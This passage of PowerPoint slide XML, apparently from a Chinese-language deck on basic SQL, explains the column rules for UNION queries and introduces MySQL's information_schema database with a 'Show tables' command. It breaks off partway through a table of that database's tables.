            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857112" y="553461"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1762453" y="1232730"/>
            <a:ext cx="5083443" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3FC21AF-E587-4023-9AD1-41DFF37400F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550506" y="2409558"/>
            <a:ext cx="10143680" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>查看这个库中的所有表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Show tables from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB806E7-AAC1-4408-B4F8-30CA3890FAFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1924673" y="3680880"/>
            <a:ext cx="6981505" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>重点关注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>三个表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2356626079"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857112" y="553461"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838490" y="1088971"/>
            <a:ext cx="5083443" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="表格 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7698E3B6-DCC1-4C76-8CFA-872D33966236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1560645037"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1380116" y="1755950"/>
          <a:ext cx="7941166" cy="4046003"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2727899">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1573940797"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5213267">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1342694405"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="804310">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
                        <a:t>表名</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104657" marR="104657" marT="52329" marB="52329"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
